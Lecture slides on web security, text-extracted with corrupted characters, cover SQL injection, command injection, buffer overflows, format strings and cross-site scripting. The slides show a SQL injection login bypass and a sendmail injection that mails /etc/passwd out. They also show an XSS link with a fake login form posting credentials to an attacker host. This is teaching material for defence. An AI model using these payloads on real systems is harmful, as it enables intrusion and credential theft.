contâd ï§ http://www.musicvision.com/network_privacy_policy.html Web security problems Third Party Advertising We use Maxworldwide and other third-party advertising companies to serve ads when you visit our Web site. These companies may use information (not including your name, address, email address or telephone number) about your visits to this and other Web sites in order to provide advertisements on this site and other sites about goods and services that may be of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, please click here Third Party Cookies In the course of serving advertisements to this site, our third-party advertiser may place or recognize a unique "cookie" on your browser. © Levente ButtyĂĄn 33
34.
Web security â
Server side risks ï§ interactive web sites are based on forms and scripts Web security problems â forms are written in html â the user fills the form and clicks on a button to submit it â this creates a request to the server that contains the data typed in by the user â the request launches a script on the server that processes the data supplied by the user (may return a page that is created using the supplied data) ï§ unexpected user input may have unexpected effects â special characters â too much data (may cause buffer overflow) ï§ at best, the server crashes ï§ at worst, the attacker gains control over the server © Levente ButtyĂĄn 34
35.
Server side risks
contâd ï§ an example: password based user authentication â assume the following server side script is used to check the supplied username and password: query$ = âSELECT name, pass FROM database WHERE name = â â + name$ + â â AND pass = â â + pass$ + â â â Result = SQLquery(query$) if Result <> 0 then OK â with name$ = buttyan and pass$ = kiskacsa Web security problems SELECT name, pass FROM database WHERE name = âbuttyanâ AND pass = âkiskacsaâ â with name$ = buttyanâ OR TRUE OR name = â and pass$ = kiskacsa SELECT name, pass FROM database WHERE name = âbuttyanâ OR TRUE OR name = ââ AND pass = âkiskacsaâ © Levente ButtyĂĄn 35
36.
Server side risks
contâd ï§ another example: the user can type her e-mail address in a form and the server sends her the latest public company report â assume the following perl script is used on the server system(âsendmail $address < report.docâ); â with $address = buttyan@hit.bme.hu system(âsendmail buttyan@hit.bme.hu < report.docâ); Web security problems â with $address = buttyan@hit.bme.hu < /etc/passwd | sendmail buttyan@hit.bme.hu system(âsendmail buttyan@hit.bme.hu < /etc/passwd | sendmail buttyan@hit.bme.hu < report.docâ); © Levente ButtyĂĄn 36
37.
Server side risks
contâd ï§ Buffer overflow attacks â if the program doesnât verify that the supplied data fits in the allocated space, then it may overwrite some parts of the memory, which may contain data, instructions, or addresses â by carefully analyzing the program structure one can provide machine code as part of the supplied data that will be executed by the server â many attacks use buffer overflow bugs (e.g., infamous Internet Worm by Morris used a buffer overflow bug in the sendmail program) Web security problems ï§ Format string attack â printf(â%sâ, str); -- correct. â printf(str); -- will compile, but dangerous! âą str will be interpreted as a format string © Levente ButtyĂĄn 37
38.
Cross site scripting ï§
the attacker arranges that the victim receives a malicious script from a trusted server ï§ example: Web security problems â Mallory places the script in the âguest bookâ of Bob â Alice visits the âguest bookâ of Bob â her browser downloads and runs Malloryâs script © Levente ButtyĂĄn 38
39.
CSS contâd ï§ another
example â when requesting a non-existent file abcd.html from some web servers, they return error messages like: âThe requested file abcd.html cannot be found on the server.â Web security problems â Mallory can place the following link on a page: < a href=âhttp://trusted.server.com/is protected. The server needs you to login.<br><form action="http://mallory.com/cgiscript.cgi" method="post">Username: <input type="text" name="name"><br>Password: <input type="password" name="pass"><br><input type="submit" value="Login"></form><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>â> â what will happen? âą Alice clicks on the link âą HTTP request is sent to trusted.server.com âą the server returns the usual error page, but it will look like a login window... © Levente ButtyĂĄn 39
40.
CSS contâd The requested
file is protected. The server needs you to log in. Username: Password: Web security problems Login browser window cannot be found on the server. © Levente Buttyån 40
41.
Conclusion ï§ there are
many more vulnerabilities and attacks Auto Coordinated © 2002 by Carnegie Mellon University http://www.cert.org/archive/ppt/cyberterror.ppt Cross site scripting âstealthâ / advanced scanning techniques High packet spoofing sniffers Intruder Knowledge sweepers Tools Staged distributed www attack tools attacks automated probes/scans denial of service GUI back doors disabling audits network mgmt. diagnostics hijacking burglaries sessions exploiting known vulnerabilities Attack Sophistication password cracking self-replicating code Intruders password guessing Low 1980 1985 1990 1995 2000 ï§ some of these cannot be prevented by technical means, but only with careful procedures and education of people ï§ this course will focus on technical countermeasures © Levente ButtyĂĄn 41
42.
Course outline ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ ï§ brief introduction
to cryptography e-mail security: PGP, S/MIME secure remote access: SSH the Secure Socket Layer (SSL) network layer security: IPSec (AH, ESP, IKE) link layer security: L2TP e-commerce security: SET, e-cash, micropayments privacy protection: Onion routing, Crowds Java security DNS security firewalls and intrusion detection systems Wi-Fi security (IEEE 802.11 wireless LAN) peer-to-peer security © Levente Buttyån 42
Download now